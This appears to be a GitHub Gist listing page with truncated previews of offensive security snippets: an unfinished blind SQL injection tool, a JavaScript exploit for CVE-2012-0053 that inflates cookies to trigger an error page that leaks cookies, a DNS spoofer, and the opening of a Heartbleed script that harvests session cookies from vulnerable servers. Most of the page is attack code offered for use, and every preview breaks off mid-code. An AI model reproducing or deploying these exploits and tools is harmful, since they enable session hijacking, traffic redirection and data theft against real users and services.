Skip to content

Instantly share code, notes, and snippets.

@sbehrens
sbehrens / sql.py
Created December 7, 2011 17:06
SQL Injection Tool
##NOT FINISHED##
## ©mastahyeti 2011##
import urllib2
import urllib
import time
import math
CHARSET = [chr(x) for x in xrange(32,39)] + [chr(x) for x in xrange(40,127)] #everything but '
CHARSET_LEN = len(CHARSET)
@sbehrens
sbehrens / CVE-2012-0053.js
Created June 18, 2012 16:36 — forked from btoews/CVE-2012-0053.js
CVE-2012-0053 Exploit
(function(d){
desired_length = 8192;
for(cookie_val = '=';cookie_val.length<=97;cookie_val+="A"){};
for(i=100;(desired_length-d.cookie.length)>111;i++,d.cookie=i+cookie_val){};
for(cookie_val="999=";(cookie_val.length + d.cookie.length + 9) <= desired_length;cookie_val += "A"){};
d.cookie = cookie_val;
d.cookie = "888=8";
x = new XMLHttpRequest();
x.onreadystatechange = function(){
if (x.readyState == 4 && x.status == 400){
@sbehrens
sbehrens / fakedns.py
Created June 20, 2012 18:43 — forked from btoews/fakedns.py
Nice DNS Spoofer
# File: fakedns.py
# Name: Interactive CLI DNS Spoofer
# by: @mastahyeti
#
# based off of http://code.activestate.com/recipes/491264/
from __future__ import print_function
from gevent.event import Event
from gevent.pool import Pool
from gevent import socket
#!/usr/bin/python
# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.
# Michael Davis (mike.philip.davis@gmail.com)
# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import select